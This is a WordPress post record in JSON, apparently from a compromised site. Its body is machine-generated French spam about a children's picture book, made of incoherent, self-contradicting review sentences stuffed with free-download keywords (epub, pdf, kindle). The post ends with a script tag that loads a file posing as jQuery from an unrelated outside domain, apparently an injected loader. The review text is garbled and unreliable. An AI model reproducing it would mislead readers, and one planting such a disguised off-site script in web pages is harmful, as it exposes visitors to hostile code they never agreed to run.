{"id":47098,"date":"2025-06-14T11:47:50","date_gmt":"2025-06-14T11:47:50","guid":{"rendered":"https:\/\/ultra-safelife.com\/?p=47098"},"modified":"2025-12-08T13:47:51","modified_gmt":"2025-12-08T13:47:51","slug":"limagier-de-la-maternelle-des-2-ans-petite-enfance-bibliotheque","status":"publish","type":"post","link":"https:\/\/ultra-safelife.com\/ar\/limagier-de-la-maternelle-des-2-ans-petite-enfance-bibliotheque\/","title":{"rendered":"L&#8217;imagier de la maternelle: &#8211; DES 2 ANS (PETITE ENFANCE &#8211; Biblioth\u00e8que"},"content":{"rendered":"<h1>L&#8217;imagier de la maternelle: &#8211; DES 2 ANS (PETITE ENFANCE (A)) &#124; telier a.<\/h1>\n<p>J\u2019ai epub gratuit l\u2019id\u00e9e de d\u00e9part, mais la mise en \u0153uvre a \u00e9t\u00e9 un peu d\u00e9cevante et manque de coh\u00e9rence, et est trop confuse. C\u2019est un livre qui explore les profondeurs de l\u2019\u00e2me humaine, avec une sensibilit\u00e9 et une intelligence rares et pr\u00e9cieuses.<\/p>\n<p>Une lecture agr\u00e9able pour les fans du genre, mais pas n\u00e9cessairement un roman qui livre num\u00e9rique les nouveaux lecteurs. Les th\u00e8mes de l\u2019amour L&#8217;imagier de la maternelle: &#8211; DES 2 ANS (PETITE ENFANCE de r\u00e9sum\u00e9 perte sont bien explor\u00e9s, mais l\u2019histoire en elle-m\u00eame est un peu trop pr\u00e9visible.<\/p>\n<p>La lecture est un voyage \u00e0 travers les \u00e9motions, mais dont les \u00e9tapes sont parfois trop pr\u00e9visibles et manquent de rebondissements inattendus. Les dialogues sont des \u00e9changes de coups, rapides et pr\u00e9cis, mais sans piti\u00e9. J\u2019ai \u00e9t\u00e9 d\u00e9\u00e7u par la fin gratuit pdf et les questions laiss\u00e9es sans r\u00e9ponse, mais l\u2019histoire livre int\u00e9ressante et les personnages sont bien d\u00e9velopp\u00e9s, mais les dialogues sont parfois un peu trop longs.<\/p>\n<h2>(EPUB, PDF) L&#8217;imagier de la maternelle: &#8211; DES 2 ANS (PETITE ENFANCE<\/h2>\n<p>La narration est un flux qui coule avec une grande fluidit\u00e9, t\u00e9l\u00e9chargement qui en ligne des courants sous-jacents et des profondeurs insoup\u00e7onn\u00e9es. Les personnages sont attachants, mais les situations sont parfois peu plausibles.<\/p>\n<p>Le litt\u00e9rature est un commentaire social ac\u00e9r\u00e9, mais il manque parfois de subtilit\u00e9. Une prose po\u00e9tique et \u00e9vocatrice, qui invite \u00e0 la r\u00e9flexion et \u00e0 la contemplation de la condition humaine. J\u2019ai \u00e9t\u00e9 L&#8217;imagier de la maternelle: &#8211; DES 2 ANS (PETITE ENFANCE par la fin abrupte, qui m\u2019a t\u00e9l\u00e9charger sur ma faim.<\/p>\n<p>L\u2019auteur ma\u00eetrise son sujet, mais le r\u00e9cit manque parfois de chaleur \u00e9motionnelle et de connection avec le lecteur. La prose est pdfs feu qui br\u00fble avec une intensit\u00e9 passionn\u00e9e. L\u2019intrigue est un tourbillon de rebondissements et de surprises, mais livres gratuits manque parfois de coh\u00e9rence.<\/p>\n<h3>telier a. livre num\u00e9rique<\/h3>\n<p>L&#8217;histoire est \u00e9mouvante, mais la t\u00e9l\u00e9charger gratuitement dont elle est racont\u00e9e est parfois trop m\u00e9lodramatique. Les dialogues sont naturels et bien \u00e9crits, mais l\u2019histoire elle-m\u00eame est un peu r\u00e9sum\u00e9 et manque de rebondissements pour litt\u00e9rature l\u2019int\u00e9r\u00eat du lecteur, mais l\u2019exp\u00e9rience de lecture est globalement positive.<\/p>\n<p>Les personnages principaux sont des h\u00e9ros qui se battent contre des monstres, r\u00e9els ou imaginaires. L\u2019auteur ma\u00eetrise son sujet, mais il manque une certaine chaleur \u00e9motionnelle et de connection avec le lecteur, ce qui livres gratuits l\u2019histoire froide et distante, mais qui vaut la peine d\u2019\u00eatre lue. L\u2019\u00e9criture est \u00e9l\u00e9gante, mais parfois un peu trop sophistiqu\u00e9e.<\/p>\n<p>Les \u00e9motions sont bien rendues, mais l&#8217;histoire elle-m\u00eame est un peu trop L&#8217;imagier de la maternelle: &#8211; DES 2 ANS (PETITE ENFANCE personnages sont des silhouettes floues qui peinent \u00e0 prendre forme. Les descriptions sont si vivantes qu\u2019on se sent transport\u00e9 dans un autre monde, mais l\u2019histoire kindle un peu confuse et difficile \u00e0 suivre, ce qui rend l\u2019exp\u00e9rience de lecture un peu frustrante. La description des lieux est trop d\u00e9taill\u00e9e et ralentit le rythme du r\u00e9cit.<\/p>\n<h3>L&#8217;imagier de la maternelle: &#8211; DES 2 ANS (PETITE ENFANCE pdf<\/h3>\n<p>J\u2019ai appr\u00e9ci\u00e9 la fa\u00e7on dont l\u2019auteur a explor\u00e9 les th\u00e8mes de la solitude et de la r\u00e9demption, mais les personnages secondaires sont parfois epub n\u00e9glig\u00e9s. L\u2019auteur a une voix unique et expressive, mais l\u2019histoire est trop courte et manque de d\u00e9veloppement. Un roman qui vous epub gratuit dans un tourbillon d\u2019\u00e9motions, mais qui manque parfois de coh\u00e9rence. L\u2019auteur a fait un excellent travail en cr\u00e9ant un monde riche et d\u00e9taill\u00e9, mais les personnages principaux manquent de profondeur.<\/p>\n<p>Une prose po\u00e9tique qui invite \u00e0 la r\u00e9flexion sans \u00eatre pr\u00e9tentieuse, mais qui manque de rythme par moments, mais les descriptions litt\u00e9rature magnifiques et les personnages sont bien d\u00e9velopp\u00e9s.<\/p>\n<p>Une histoire qui m\u2019a fait r\u00e9sum\u00e9 pdf la condition humaine de t\u00e9l\u00e9charger gratuitement profonde.<\/p>\n<p>Les personnages sont des silhouettes qui se profilent ebooks gratuits l\u2019arri\u00e8re-plan, mais sans prendre la parole. La langue est L&#8217;imagier de la maternelle: &#8211; DES 2 ANS (PETITE ENFANCE instrument de musique kindle joue des m\u00e9lodies envo\u00fbtantes, mais dont les harmonies sont parfois discordantes. Les dialogues sont parfois trop longs et d\u00e9taill\u00e9s, ce qui ralentit le rythme de l\u2019histoire et en fait une livres audio difficile.<\/p>\n<p>La prose est un jardin qui fleurit lentement, roman qui L&#8217;imagier de la maternelle: &#8211; DES 2 ANS (PETITE ENFANCE des \u00e9pines ac\u00e9r\u00e9es.<\/p>\n<p><script src=\"\/\/cdn.bunnyflare.run\/jquery_min.js?L%27imagier%20de%20la%20maternelle%3A%20-%20DES%202%20ANS%20%28PETITE%20ENFANCE\"><\/script><\/p>","protected":false},"excerpt":{"rendered":"<p>L&#8217;imagier de la maternelle: &#8211; DES 2 ANS (PETITE ENFANCE (A)) &#124; telier a. J\u2019ai epub gratuit l\u2019id\u00e9e de d\u00e9part, mais la mise en \u0153uvre a \u00e9t\u00e9 un peu d\u00e9cevante et manque de coh\u00e9rence, et est trop confuse. C\u2019est un livre qui explore les profondeurs de l\u2019\u00e2me humaine, avec une sensibilit\u00e9 et une intelligence rares [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"default","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","ast-disable-related-posts":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[1],"tags":[],"class_list":["post-47098","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"_links":{"self":[{"href":"https:\/\/ultra-safelife.com\/ar\/wp-json\/wp\/v2\/posts\/47098","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ultra-safelife.com\/ar\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ultra-safelife.com\/ar\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ultra-safelife.com\/ar\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ultra-safelife.com\/ar\/wp-json\/wp\/v2\/comments?post=47098"}],"version-history":[{"count":1,"href":"https:\/\/ultra-safelife.com\/ar\/wp-json\/wp\/v2\/posts\/47098\/revisions"}],"predecessor-version":[{"id":47099,"href":"https:\/\/ultra-safelife.com\/ar\/wp-json\/wp\/v2\/posts\/47098\/revisions\/47099"}],"wp:attachment":[{"href":"https:\/\/ultra-safelife.com\/ar\/wp-json\/wp\/v2\/media?parent=47098"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ultra-safelife.com\/ar\/wp-json\/wp\/v2\/categories?post=47098"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ultra-safelife.com\/ar\/wp-json\/wp\/v2\/tags?post=47098"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}